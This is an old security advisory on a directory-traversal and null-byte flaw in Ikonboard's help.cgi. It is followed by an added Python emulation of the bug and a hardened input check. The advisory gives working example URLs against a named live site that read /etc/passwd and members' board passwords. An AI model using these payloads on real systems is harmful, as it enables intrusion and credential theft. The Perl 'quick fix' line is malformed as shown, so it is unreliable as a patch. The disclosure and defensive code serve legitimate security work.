
Ikonboard permission vulnerability

by phiber on March 12th, 2001

There is another bug in the Ikonboard. A malicious user can read any file on the remote system with the privileges of the web server.
Ikonboard version: 2.1.7b

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

- would show the password file, if it is readable with the privileges of the web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/.cgi%00

- replace with the member name and it shows you his/her board-password.

(works with Administrator accounts too)

No patches yet available, vendor notified.

Quick fix:

You could fix the script temporarily by inserting the following line under line 45 in 'help.cgi':

$inhelpon =~ s////g;

This is lame, but it works.

Contributed by Martin J. Muench on a BT mailing list
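As an added illustration, not code from the advisory or from Ikonboard itself, the Python below emulates why a suffix appended by the script gives no protection once a %00 sits in the parameter (the underlying C open() stops at the first NUL byte), and shows a validation routine that refuses such requests outright. The help directory path, the `.html` suffix and the function names are assumptions.

```python
import os
import posixpath
import re
from urllib.parse import unquote

# Assumed layout for the example; Ikonboard's real paths may differ.
HELP_DIR = "/var/www/cgi-bin/ikonboard/help"
# A help topic is a plain name: no slashes, dots or control bytes.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def effective_open_path(helpon, help_dir=HELP_DIR, suffix=".html"):
    """Emulate what an unchecked open(help_dir/helpon.suffix) really touches.
    Perl hands the string to the C library, which treats the first NUL as the
    end of the filename, so everything after a decoded %00 (including the
    suffix the script appended) is silently dropped."""
    raw = unquote(helpon)  # %00 -> "\x00", %2e%2e -> ".."
    path = posixpath.join(help_dir, raw + suffix)
    truncated = path.split("\x00", 1)[0]
    return posixpath.normpath(truncated)


def validate_helpon(helpon, help_dir=HELP_DIR, suffix=".html"):
    """Hardened lookup: decode, reject NUL bytes and anything that is not a
    bare topic name, then confirm the resolved path is still inside help_dir.
    Returns the absolute path to serve, or None if the request is refused."""
    raw = unquote(helpon)
    if "\x00" in raw or not SAFE_NAME.match(raw):
        return None
    root = os.path.realpath(help_dir)
    candidate = os.path.realpath(os.path.join(root, raw + suffix))
    # realpath collapses ".." and symlinks before the containment check.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```

The first function exists only to make the failure mode visible; the second is the check a patched help.cgi would need to perform before opening anything.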
